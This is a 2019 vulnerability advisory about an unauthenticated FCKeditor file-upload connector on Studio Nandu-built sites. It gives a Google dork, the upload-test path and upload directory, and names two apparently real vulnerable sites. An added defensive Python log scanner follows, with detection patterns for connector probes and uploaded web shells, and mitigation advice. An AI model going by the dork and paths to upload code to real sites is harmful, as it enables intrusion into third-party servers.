Schwabe Slovakia WebDesign Studio Nandu Unauthorized File Insertion

2019.05.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

####################################################################
# Exploit Title : Schwabe Slovakia Studio Nandu Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : nandu.cz
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Copyright © 2012 Schwabe Slovakia s.r.o., webdesign studio nandu
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description About Software :
*****************************
Schwabe Slovakia Studio Nandu is a web design company in the Czech Republic.
####################################################################
# Impact :
***********
Schwabe Slovakia Studio Nandu is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
Directory File Path :
*******************
/_data_editor/[YOURFILENAME].txt .jpg .gif .png
####################################################################
# Example Vulnerable Sites :
************************
[+] sinupret.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] kaloba.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
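The weakness described above is an FCKeditor file-manager connector left reachable without authentication, with uploaded files landing under /_data_editor/. The following Python script is an added example for defenders, not part of the advisory: it scans web-server access logs in combined format and flags (a) requests to the connector directory, including the uploadtest.html test page, (b) POSTs to it (uploads), and (c) any request for a script-extension file inside the upload directory, which is the signature of an upload that has been turned into code execution. The log lines, IP addresses and the connectors/php/upload.php path in the sample are constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines (Apache/nginx combined format).
# They are not taken from the advisory or from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [21/May/2019:10:02:11 +0200] "GET /admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.5 - - [21/May/2019:10:02:40 +0200] "POST /admin/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [21/May/2019:10:03:02 +0200] "GET /_data_editor/shell.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [21/May/2019:10:05:00 +0200] "GET /_data_editor/logo.png HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [21/May/2019:10:05:10 +0200] "GET /index.php HTTP/1.1" 200 9802 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Paths taken from the advisory: the connector directory and the upload directory.
CONNECTOR_PREFIX = "/admin/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/_data_editor/"
# Extensions that the web server would execute rather than serve as data.
SCRIPT_EXT = {".php", ".php3", ".php5", ".phtml", ".asp", ".aspx", ".jsp", ".cgi", ".pl"}


def parse_line(line):
    """Parse one combined-format log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Normalise: drop the query string and lower-case the path so that
    # /Admin/FCKeditor/... and ?Type=File variants are still matched.
    entry["path"] = urlsplit(entry["target"]).path.lower()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return a detection tag for a parsed entry, or None if it is uninteresting."""
    path = entry["path"]
    if path.startswith(CONNECTOR_PREFIX):
        if path.endswith("uploadtest.html"):
            return "fckeditor_uploadtest_probe"
        if entry["method"] == "POST":
            return "fckeditor_connector_upload"
        return "fckeditor_connector_access"
    if path.startswith(UPLOAD_DIR):
        filename = path.rsplit("/", 1)[-1]
        ext = path[path.rfind("."):] if "." in filename else ""
        if ext in SCRIPT_EXT:
            # A script fetched from the upload directory: the upload has become code.
            return "script_in_upload_dir"
    return None


def scan(log_text):
    """Scan log text and return (ip, method, path, tag) tuples for flagged requests."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tag = classify(entry)
        if tag:
            findings.append((entry["ip"], entry["method"], entry["path"], tag))
    return findings


if __name__ == "__main__":
    for ip, method, path, tag in scan(SAMPLE_LOG):
        print(f"{tag:28s} {ip:15s} {method:5s} {path}")
```

The three flagged lines in the sample are the sequence a defender wants to see grouped by client address: a probe of uploadtest.html, a POST to the connector, then a request for a .php file under /_data_editor/. Beyond detection, the mitigation that removes the class of bug is to block or delete the connectors directory and to configure the web server so that nothing under /_data_editor/ is executed as a script.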
Copyright 2019, cxsecurity.com